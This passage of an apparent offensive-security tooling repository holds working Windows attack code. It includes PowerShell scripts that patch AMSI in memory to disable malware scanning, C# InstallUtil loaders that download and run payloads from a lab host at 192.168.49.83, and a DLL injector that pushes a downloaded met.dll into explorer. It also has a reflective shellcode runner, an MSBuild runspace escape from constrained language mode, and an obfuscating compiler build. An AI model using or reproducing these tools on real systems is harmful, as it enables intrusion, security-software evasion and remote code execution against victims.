20 | $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
21 |
22 | $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
23 |
24 | return $type.CreateType()
25 | }
26 |
27 | [IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
28 | $oldProtectionBuffer = 0
29 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32],[UInt32].MakeByRefType()) ([Bool])))
30 | $vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
31 |
32 | $buf = [Byte[]] (0x48, 0x31, 0xC0)
33 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)
34 | # restore
35 | $vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)
--------------------------------------------------------------------------------
/misc/ScRunner.aspx:
--------------------------------------------------------------------------------
1 | <%@ Page Language="C#" AutoEventWireup="true" %>
2 | <%@ Import Namespace="System.IO" %>
3 |
40 |
--------------------------------------------------------------------------------
/csharp/SharpDllPoc.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Runtime.InteropServices;
4 | using System.Windows.Forms;
5 | using RGiesecke.DllExport;
6 |
7 | // Requirements:
8 | // 1. Install Build Tools 2015 - https://www.microsoft.com/en-us/download/details.aspx?id=48159
9 | // 2. Install .NET Framework v3.5 https://www.microsoft.com/en-us/download/details.aspx?id=21
10 | // 3. Add the UnmanagedExports Nuget
11 |
12 | // execute: rundll32.exe GoStager.dll,Start
13 |
14 | namespace GoStager
15 | {
16 | public class GoStager
17 | {
18 | public GoStager()
19 | {
20 | // hard-coded root canary domain
21 | string strTargetDomain = "";
22 | var random = new Random();
23 |
24 | string strDomainName = random.Next(1000).ToString() + "." + strTargetDomain;
25 | string strDomainAddress = DnsResolve(strDomainName);
26 |
27 | //MessageBox.Show("Do you want to continue?", "Question", MessageBoxButtons.YesNo);
28 | }
29 | [STAThread]
30 | public static void Main(string[] args)
31 | {
32 | new GoStager();
33 | }
34 | public static void Execute()
35 | {
36 | new GoStager();
37 | }
38 | private static string DnsResolve(string domainName)
39 | {
40 | string strAddr;
41 | try
42 | {
43 | strAddr = Dns.GetHostEntry(domainName).AddressList[0].ToString();
44 | }
45 | catch
46 | {
47 | strAddr = "Not Found";
48 | }
49 |
50 | return strAddr;
51 | }
52 | }
53 | public class Exports
54 | {
55 | [DllExport("Start", CallingConvention = CallingConvention.Cdecl)]
56 | public static void GoEntry(IntPtr hwnd,
57 | IntPtr hinst,
58 | string lpszCmdLine,
59 | int nCmdShow)
60 | {
61 | new GoStager();
62 | }
63 | }
64 | }
65 |
--------------------------------------------------------------------------------
/csharp/UninstallerRunspaceBypass.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Configuration.Install;
3 | using System.IO;
4 | using System.Management.Automation;
5 | using System.Management.Automation.Runspaces;
6 | using System.Net;
7 | using System.Text;
8 |
9 | // Need to:
10 | // 1. References > Add > Assemblies > System.Configuration.Install
11 | // 2. References > Browse > c:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
12 |
13 | namespace UninstallerBypass
14 | {
15 | class Program
16 | {
17 | static void Main(string[] args)
18 | {
19 | Console.WriteLine("2 + 3 = 2");
20 | }
21 | }
22 |
23 | [System.ComponentModel.RunInstaller(true)]
24 | public class Sample : System.Configuration.Install.Installer
25 | {
26 | public override void Uninstall(System.Collections.IDictionary savedState)
27 | {
28 | Runspace rs = RunspaceFactory.CreateRunspace();
29 | rs.Open();
30 |
31 | // instantiate a PowerShell object
32 | PowerShell ps = PowerShell.Create();
33 | ps.Runspace = rs;
34 |
35 | // base64 -w 0 payload.ps1 | tee robots.txt
36 | String cmd = GetPayload("http://192.168.49.83/robots.txt");
37 | ps.AddScript(cmd);
38 | ps.Invoke();
39 | rs.Close();
40 | }
41 | public static string GetPayload(string url)
42 | {
43 | WebClient client = new WebClient();
44 | // what be the user agent?
45 | // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
46 | client.Proxy = WebRequest.GetSystemWebProxy();
47 | client.Proxy.Credentials = CredentialCache.DefaultCredentials;
48 | string compressedEncodedShellcode = client.DownloadString(url);
49 | byte[] data = Convert.FromBase64String(compressedEncodedShellcode);
50 | return Encoding.UTF8.GetString(data);
51 | }
52 | }
53 | }
54 |
--------------------------------------------------------------------------------
/csharp/UninstallerReflectiveDllLoader.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Configuration.Install;
3 | using System.IO;
4 | using System.Management.Automation;
5 | using System.Management.Automation.Runspaces;
6 | using System.Net;
7 | using System.Reflection;
8 |
9 | // Need to:
10 | // 1. References > Add > Assemblies > System.Configuration.Install
11 | // 2. References > Browse > c:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
12 |
13 | namespace UninstallerBypass
14 | {
15 | class Program
16 | {
17 | static void Main(string[] args)
18 | {
19 | Console.WriteLine("Likes initialization...");
20 | }
21 | }
22 |
23 | [System.ComponentModel.RunInstaller(true)]
24 | public class Sample : System.Configuration.Install.Installer
25 | {
26 | public override void Uninstall(System.Collections.IDictionary savedState)
27 | {
28 | byte[] dll = GetShellcode("http://192.168.49.83:8080/main");
29 |
30 | Assembly SampleAssembly = Assembly.Load(dll);
31 |
32 | Type t = SampleAssembly.GetType("Program.Payload");
33 |
34 | var staticMethod = t.GetMethod("runner");
35 |
36 | staticMethod.Invoke(null, null);
37 | }
38 | public static byte[] GetShellcode(string url)
39 | {
40 | ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
41 | ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };
42 | WebClient client = new WebClient();
43 | // what be the user agent?
44 | // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
45 | client.Proxy = WebRequest.GetSystemWebProxy();
46 | client.Proxy.Credentials = CredentialCache.DefaultCredentials;
47 | string compressedEncodedShellcode = client.DownloadString(url);
48 | return Convert.FromBase64String(compressedEncodedShellcode);
49 | }
50 | }
51 | }
--------------------------------------------------------------------------------
/csharp/UninstallerReflectivePELoader.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Configuration.Install;
3 | using System.IO;
4 | using System.Management.Automation;
5 | using System.Management.Automation.Runspaces;
6 | using System.Net;
7 | using System.Reflection;
8 |
9 | // Need to:
10 | // 1. References > Add > Assemblies > System.Configuration.Install
11 | // 2. References > Browse > c:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
12 |
13 | namespace UninstallerBypass
14 | {
15 | class Program
16 | {
17 | static void Main(string[] args)
18 | {
19 | Console.WriteLine("Likes initialization...");
20 | }
21 | }
22 |
23 | [System.ComponentModel.RunInstaller(true)]
24 | public class Sample : System.Configuration.Install.Installer
25 | {
26 | public override void Uninstall(System.Collections.IDictionary savedState)
27 | {
28 | byte[] bytes = GetShellcode("http://192.168.49.83:8080/main");
29 |
30 | var assembly = Assembly.Load(bytes);
31 | MethodInfo method = assembly.EntryPoint;
32 | if (method != null)
33 | {
34 | method.Invoke(null, new object[] { new string[] { } });
35 | }
36 | }
37 | public static byte[] GetShellcode(string url)
38 | {
39 | ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
40 | ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };
41 | WebClient client = new WebClient();
42 | // what be the user agent?
43 | // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
44 | client.Proxy = WebRequest.GetSystemWebProxy();
45 | client.Proxy.Credentials = CredentialCache.DefaultCredentials;
46 | string compressedEncodedShellcode = client.DownloadString(url);
47 | return Convert.FromBase64String(compressedEncodedShellcode);
48 | }
49 | }
50 | }
--------------------------------------------------------------------------------
/psh/AmsiBypass-AmsiScanBuffer.ps1:
--------------------------------------------------------------------------------
1 | function LookupFunc {
2 |
3 | Param ($moduleName, $functionName)
4 |
5 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
6 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
7 | $tmp=@()
8 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
9 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))
10 | }
11 |
12 | function getDelegateType {
13 | Param (
14 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
15 | [Parameter(Position = 1)] [Type] $delType = [Void]
16 | )
17 |
18 | $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])
19 |
20 | $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
21 |
22 | $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
23 |
24 | return $type.CreateType()
25 | }
26 | $z1 = 'AmsiS'
27 | $z2 = 'canB'
28 | $z3 = 'uffer'
29 | $z = $z1 + $z2 + $z3
30 | [IntPtr]$funcAddr = LookupFunc amsi.dll $z
31 | $oldProtectionBuffer = 0
32 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32],[UInt32].MakeByRefType()) ([Bool])))
33 | # in rasta's , arg #2 is "[uint32]5"
34 | $vp.Invoke($funcAddr, [uint32]5, 0x40, [ref]$oldProtectionBuffer)
35 |
36 | # original: $buf = [Byte[]] (0x48, 0x31, 0xC0)
37 | $buf = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
38 |
39 | # in rasta's, last arg is 6
40 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 6)
41 | # restore
42 | #$vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)
--------------------------------------------------------------------------------
/c/windows/xor_test.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include // For the SIZE_T and PBYTE types
5 |
6 | // Function declaration
7 | VOID XorByInputKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN PBYTE bKey, IN SIZE_T sKeySize);
8 |
9 | // Function to read file into a buffer
10 | PBYTE ReadFileToBuffer(const char *filePath, SIZE_T *fileSize) {
11 | FILE *file = fopen(filePath, "rb");
12 | if (!file) {
13 | perror("Failed to open file");
14 | return NULL;
15 | }
16 |
17 | fseek(file, 0, SEEK_END);
18 | *fileSize = ftell(file);
19 | fseek(file, 0, SEEK_SET);
20 |
21 | PBYTE buffer = (PBYTE)malloc(*fileSize);
22 | if (!buffer) {
23 | perror("Failed to allocate memory");
24 | fclose(file);
25 | return NULL;
26 | }
27 |
28 | fread(buffer, 1, *fileSize, file);
29 | fclose(file);
30 |
31 | return buffer;
32 | }
33 |
34 | int main(int argc, char *argv[]) {
35 | if (argc != 3) {
36 | fprintf(stderr, "Usage: %s \n", argv[0]);
37 | return EXIT_FAILURE;
38 | }
39 |
40 | SIZE_T fileSize;
41 | PBYTE payload = ReadFileToBuffer(argv[1], &fileSize);
42 | if (!payload) {
43 | return EXIT_FAILURE;
44 | }
45 |
46 | // Get the key from the command line argument
47 | PBYTE key = (PBYTE)argv[2];
48 | SIZE_T keySize = strlen(argv[2]);
49 |
50 | // Decode the payload (since XOR is symmetric, the same function is used)
51 | XorByInputKey(payload, fileSize, key, keySize);
52 |
53 | // Print decoded payload
54 | printf("Decoded Data:\n");
55 | for (SIZE_T i = 0; i < fileSize; i++) {
56 | printf("%c", payload[i]);
57 | }
58 | printf("\n");
59 |
60 | free(payload);
61 | return EXIT_SUCCESS;
62 | }
63 |
64 | // Function definition
65 | VOID XorByInputKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN PBYTE bKey, IN SIZE_T sKeySize) {
66 | for (size_t i = 0, j = 0; i < sShellcodeSize; i++, j++) {
67 | if (j >= sKeySize) {
68 | j = 0;
69 | }
70 | pShellcode[i] = pShellcode[i] ^ bKey[j];
71 | }
72 | }
73 |
--------------------------------------------------------------------------------
/infra/Dockerfile.ollvm:
--------------------------------------------------------------------------------
1 | LABEL org.opencontainers.image.title="ollvm13-heroims"
2 | LABEL org.opencontainers.image.authors="thelikes@github.com"
3 | LABEL org.opencontainers.image.description="ollvm13-heroims based build environment with zlib support"
4 | # ref https://hub.docker.com/r/snovvcrash/ollvm13
5 |
6 | FROM alpine:3.18
7 |
8 | # Install required packages
9 | RUN apk update && \
10 | apk add --no-cache build-base \
11 | cmake \
12 | git \
13 | python3 \
14 | mingw-w64-gcc \
15 | mingw-w64-crt \
16 | mingw-w64-headers \
17 | nasm \
18 | zlib \
19 | zlib-dev \
20 | wget && \
21 | rm -rf /var/cache/apk/*
22 |
23 | # Clone and build the obfuscator project
24 | RUN git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm && \
25 | cd /opt/ollvm && \
26 | wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch && \
27 | patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch && \
28 | mkdir build && \
29 | cd build && \
30 | cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm && \
31 | sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt && \
32 | sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=`realpath ../clang`|g" CMakeCache.txt && \
33 | make -j$(nproc) && \
34 | make install && \
35 | cd / && \
36 | rm -rf /opt/ollvm
37 |
38 | # Clone and build the wclang project
39 | RUN git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang && \
40 | cd /opt/wclang && \
41 | cmake . && \
42 | make -j$(nproc) && \
43 | make install && \
44 | cd / && \
45 | rm -rf /opt/wclang
46 |
47 | # Download and build MinGW zlib from source
48 | RUN wget https://zlib.net/zlib-1.3.1.tar.gz -O /tmp/zlib-1.3.1.tar.gz && \
49 | tar -xzf /tmp/zlib-1.3.1.tar.gz -C /tmp && \
50 | cd /tmp/zlib-1.3.1 && \
51 | CC=x86_64-w64-mingw32-gcc ./configure --prefix=/usr/x86_64-w64-mingw32 --static && \
52 | make && \
53 | make install
54 |
55 | WORKDIR /tmp
56 |
57 | CMD ["/bin/sh"]
58 |
--------------------------------------------------------------------------------
/psh/ReflectiveScRunnerPInvoke.ps1:
--------------------------------------------------------------------------------
1 | function LookupFunc {
2 | Param ($moduleName, $functionName)
3 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
4 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
5 | $tmp=@()
6 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
7 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
8 | }
9 |
10 | function getDelegateType {
11 | Param (
12 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
13 | [Parameter(Position = 1)] [Type] $delType = [Void]
14 | )
15 |
16 | $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
17 |
18 | $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
19 |
20 | $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
21 |
22 | return $type.CreateType()
23 | }
24 |
25 | $lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
26 |
27 | [Byte[]] $buf = 0xfc,[...],0xd5
28 |
29 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
30 | $hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
31 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)
--------------------------------------------------------------------------------
/csharp/DllInject.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Net;
6 | using System.Runtime.InteropServices;
7 | using System.Diagnostics;
8 |
9 | namespace DllInject
10 | {
11 | class Program
12 | {
13 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
14 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
15 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
16 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
17 | [DllImport("kernel32.dll")]
18 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
19 | [DllImport("kernel32.dll")]
20 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
21 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
22 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
23 | [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
24 | public static extern IntPtr GetModuleHandle(string lpModuleName);
25 | static void Main(string[] args)
26 | {
27 | String dir = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
28 | String dllName = dir + "\\met.dll";
29 |
30 | WebClient wc = new WebClient();
31 | wc.DownloadFile("http://192.168.49.83/met.dll", dllName);
32 |
33 | Process[] expProc = Process.GetProcessesByName("explorer");
34 | int pid = expProc[0].Id;
35 |
36 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid);
37 |
38 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
39 | IntPtr outSize;
40 | Boolean res = WriteProcessMemory(hProcess, addr, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize);
41 |
42 | IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
43 |
44 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero);
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/csharp/RunspaceBypass.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using Microsoft.Build.Framework;
4 | using Microsoft.Build.Utilities;
5 | using System.IO;
6 | using System.Management.Automation;
7 | using System.Management.Automation.Runspaces;
8 | using System.Collections.ObjectModel;
9 | using System.Linq;
10 | using System.Reflection;
11 |
12 | public class ClassExample : Task, ITask
13 | {
14 | public override bool Execute()
15 | {
16 | string cmd = "$ExecutionContext.SessionState.LanguageMode";
17 |
18 | Runspace rs = RunspaceFactory.CreateRunspace();
19 | rs.Open();
20 |
21 | // instantiate a PowerShell object
22 | PowerShell ps = PowerShell.Create();
23 | ps.Runspace = rs;
24 |
25 | while (true)
26 | {
27 | Console.Write("PS> ");
28 | cmd = Console.ReadLine();
29 | if (String.IsNullOrWhiteSpace(cmd) || cmd == "exit" || cmd == "quit") break;
30 | ps.AddScript(cmd);
31 | ps.AddCommand("Out-String");
32 | PSDataCollection